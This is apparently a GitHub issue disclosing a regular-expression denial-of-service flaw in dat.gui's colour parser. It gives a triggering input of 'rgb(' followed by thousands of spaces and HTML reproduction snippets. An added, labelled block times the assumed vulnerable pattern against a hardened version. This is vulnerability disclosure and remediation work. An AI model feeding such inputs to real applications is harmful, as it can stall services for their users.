Closed yetingli closed 3 years ago
Type of Issue: Potential Regex Denial of Service (ReDoS)
Description: The vulnerable regular expression is located in
https://github.com/dataarts/dat.gui/blob/51d1a37b00326c232f34d9b80dc6dea2bec8595b/src/dat/color/interpret.js#L61
https://github.com/dataarts/dat.gui/blob/51d1a37b00326c232f34d9b80dc6dea2bec8595b/src/dat/color/interpret.js#L79
The ReDoS vulnerability of the regex is mainly due to the sub-pattern \s*(.+)\s* and can be exploited with the following string: "rgb("+" " * 5000
You can execute the following code to reproduce the ReDoS:
<script type="text/javascript" src="build/dat.gui.js"></script>
<script type="text/javascript">
  var gui = new dat.gui.GUI();
  var Options = function() {
    this.color0 = "rgb( "; // CSS string
  };
  window.onload = function() {
    var options = new Options();
    gui.addColor(options, 'color0');
  };
</script>

<script type="text/javascript" src="build/dat.gui.js"></script>
<script type="text/javascript">
  var gui = new dat.gui.GUI();
  var Options = function() {
    this.color0 = "rgba( "; // CSS string
  };
  window.onload = function() {
    var options = new Options();
    gui.addColor(options, 'color0');
  };
</script>
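
An added example, not part of the issue or of dat.gui's code: it contrasts a pattern built around the quoted sub-pattern \s*(.+)\s* with one possible hardened pattern plus a length cap, and times both on small inputs. The full shape of VULNERABLE_RGB is an assumption (only the sub-pattern is quoted above), and every name in the block is introduced here.

```javascript
// Assumed shape of the affected pattern: only the sub-pattern \s*(.+)\s* is
// quoted in the issue; the three comma-separated groups are an assumption.
const VULNERABLE_RGB = /^rgb\(\s*(.+)\s*,\s*(.+)\s*,\s*(.+)\s*\)/;

// Hardened form: a component cannot contain whitespace, commas or
// parentheses, so it never overlaps with the \s* runs on either side of it.
const HARDENED_RGB = /^rgb\(\s*([^\s,()]+)\s*,\s*([^\s,()]+)\s*,\s*([^\s,()]+)\s*\)/;

const MAX_COLOR_LENGTH = 64; // hypothetical cap; CSS rgb() strings are short

// Parse "rgb(r, g, b)" into numbers, or return null for anything else.
function parseRgb(input) {
  if (typeof input !== 'string' || input.length > MAX_COLOR_LENGTH) return null;
  const m = HARDENED_RGB.exec(input);
  if (!m) return null;
  const parts = m.slice(1).map((s) => parseFloat(s));
  return parts.some(Number.isNaN) ? null : { r: parts[0], g: parts[1], b: parts[2] };
}

// Time one failed match against "rgb(" followed by n spaces.
function timeFailedMatch(regex, n) {
  const input = 'rgb(' + ' '.repeat(n);
  const start = performance.now();
  const matched = regex.test(input);
  return { matched, ms: performance.now() - start };
}

// Small sizes only: enough to see the growth without stalling the page.
// In the assumed pattern, \s*, .+ and \s* can all consume the same spaces,
// so a failed match explores roughly n^3 ways to split the run.
function compare(sizes = [100, 200, 400]) {
  return sizes.map((n) => ({
    n,
    vulnerableMs: timeFailedMatch(VULNERABLE_RGB, n).ms,
    hardenedMs: timeFailedMatch(HARDENED_RGB, n).ms,
  }));
}
```

Calling compare() and logging the rows shows vulnerableMs climbing steeply as n doubles while hardenedMs stays flat.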